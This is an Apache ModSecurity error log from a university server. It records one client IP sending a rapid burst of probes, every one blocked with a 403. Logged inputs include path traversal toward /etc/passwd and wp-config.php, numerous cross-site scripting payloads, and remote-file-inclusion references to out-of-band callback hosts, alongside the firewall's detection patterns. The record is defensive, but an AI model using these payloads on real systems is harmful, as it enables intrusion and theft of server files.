[Tue Aug 29 11:55:48.703129 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://example.com found within TX:1: example.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfeb.unla.ac.id"] [uri "/ilias/shib_logout.php"] [unique_id "ZO16VMCo-f0AAAqqtkgAAAAA"]
[Tue Aug 29 11:55:51.767081 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16V8Co-f0AAAolKxkAAAAe"]
[Tue Aug 29 11:55:52.206749 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:login: \\x5c\\x22 onfocus=alert(document.domain); autofocus \\x5c\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/webshell4/login.php"] [unique_id "ZO16WMCo-f0AAApbUqEAAAAh"]
[Tue Aug 29 11:55:52.304052 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb0466nqp6ogekco.oast.site found within TX:1: cjmnijtjmimvgniikdb0466nqp6ogekco.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfeb.unla.ac.id"] [uri "/umbraco/BackOffice/Api/Help/GetContextHelpForPage"] [unique_id "ZO16WMCo-f0AAAqeFd8AAAAx"]
[Tue Aug 29 11:55:52.726909 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb05foazmoybdza4.oast.site/ found within TX:1: cjmnijtjmimvgniikdb05foazmoybdza4.oast.site/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfeb.unla.ac.id"] [uri "/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardContent"] [unique_id "ZO16WMCo-f0AAApbUrAAAAAh"]
[Tue Aug 29 11:55:53.583636 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:plugin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:plugin: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/whizz/plugins/delete-plugin.php"] [unique_id "ZO16WcCo-f0AAAqeFeIAAAAx"]
[Tue Aug 29 11:55:53.824365 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:msgId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')// found within ARGS:msgId: ';alert('document.domain')//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/carbon/admin/login.jsp"] [unique_id "ZO16WcCo-f0AAAq5@GkAAAAK"]
[Tue Aug 29 11:55:53.891177 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:bgColor. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:bgColor: _000000\\x22onload=\\x22prompt(1)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfeb.unla.ac.id"] [uri "/Telerik.ReportViewer.axd"] [unique_id "ZO16WcCo-f0AAAqY6MUAAAAr"]
[Tue Aug 29 11:55:53.927289 2023] [:error] [pid 2744] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb0rwse71q1wzhzg.oast.site/ found within TX:1: cjmnijtjmimvgniikdb0rwse71q1wzhzg.oast.site/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfeb.unla.ac.id"] [uri "/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardCss"] [unique_id "ZO16WcCo-f0AAAq4fZMAAAAJ"]
[Tue Aug 29 11:55:55.723858 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfeb.unla.ac.id"] [uri "/"] [unique_id "ZO16W8Co-f0AAAq5@HcAAAAK"]
[Tue Aug 29 11:55:56.607260 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:s: ax6zt\\x22><script>alert(document.domain)</script>y6uu6"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/"] [unique_id "ZO16XMCo-f0AAApbUrcAAAAh"]
[Tue Aug 29 11:55:56.717845 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16XMCo-f0AAAq5@IEAAAAK"]
[Tue Aug 29 11:55:57.668046 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/db-backup/download.php"] [unique_id "ZO16XcCo-f0AAAqeFf8AAAAx"]
[Tue Aug 29 11:55:58.688247 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfeb.unla.ac.id"] [uri "/webmail/basic/"] [unique_id "ZO16XsCo-f0AAAqTv0kAAAAa"]
[Tue Aug 29 11:55:59.529276 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:p. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:p: <img src onerror=alert(/XSS/)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16X8Co-f0AAArB1tgAAAAV"]
[Tue Aug 29 11:55:59.811240 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wpbase. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:wpbase: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/sourceafrica/js/window.php"] [unique_id "ZO16X8Co-f0AAAq@scoAAAAM"]
[Tue Aug 29 11:56:01.589658 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:hostname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22)</ found within ARGS:hostname: \\x22)</script><script>alert(document.domain);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/cgi-bin/login.cgi"] [unique_id "ZO16YcCo-f0AAApa-RAAAAAg"]
[Tue Aug 29 11:56:01.615448 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:wlcms[_login_custom_js]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:wlcms[_login_custom_js]: alert(/XSS/);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO16YcCo-f0AAApa-REAAAAg"]
[Tue Aug 29 11:56:01.617008 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:username: test\\x22><svg/onload=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfeb.unla.ac.id"] [uri "/goform/login_process"] [unique_id "ZO16YcCo-f0AAAqeFgcAAAAx"]
[Tue Aug 29 11:56:02.795803 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keyword_search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: --!>\\x22  found within ARGS:keyword_search: --!>\\x22 autofocus onfocus=alert(/2Ue0IXhHNjNl9QMpplilzBsRqJA/);//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/properties/"] [unique_id "ZO16YsCo-f0AAAqSw5QAAAAN"]
[Tue Aug 29 11:56:02.810445 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:foruserlogin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:foruserlogin: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/dolibarr/adherents/cartes/carte.php"] [unique_id "ZO16YsCo-f0AAAqY6PUAAAAr"]
[Tue Aug 29 11:56:03.677518 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:urls[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:urls[]: <img src=x onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16Y8Co-f0AAAqeFhcAAAAx"]
[Tue Aug 29 11:56:03.751418 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cat_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:cat_id: 6\\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/"] [unique_id "ZO16Y8Co-f0AAArC7eMAAAAW"]
[Tue Aug 29 11:56:04.647165 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:sortBy. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:sortBy: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO16ZMCo-f0AAAqeFh8AAAAx"]
[Tue Aug 29 11:56:04.667855 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:snum. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:snum: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/featurific-for-wordpress/cached_image.php"] [unique_id "ZO16ZMCo-f0AAApbUucAAAAh"]
[Tue Aug 29 11:56:04.710509 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfeb.unla.ac.id"] [uri "/sap/public/bc/icf/logoff"] [unique_id "ZO16ZMCo-f0AAArB1voAAAAV"]
[Tue Aug 29 11:56:05.577653 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:page: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/simpel-reserveren/edit.php"] [unique_id "ZO16ZcCo-f0AAAq@sekAAAAM"]
[Tue Aug 29 11:56:05.759715 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:ID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:ID: 1</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php"] [unique_id "ZO16ZcCo-f0AAAq@se4AAAAM"]
[Tue Aug 29 11:56:06.647632 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:submit: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php"] [unique_id "ZO16ZsCo-f0AAAqY6QQAAAAr"]
[Tue Aug 29 11:56:07.668728 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:title_az. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:title_az: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag 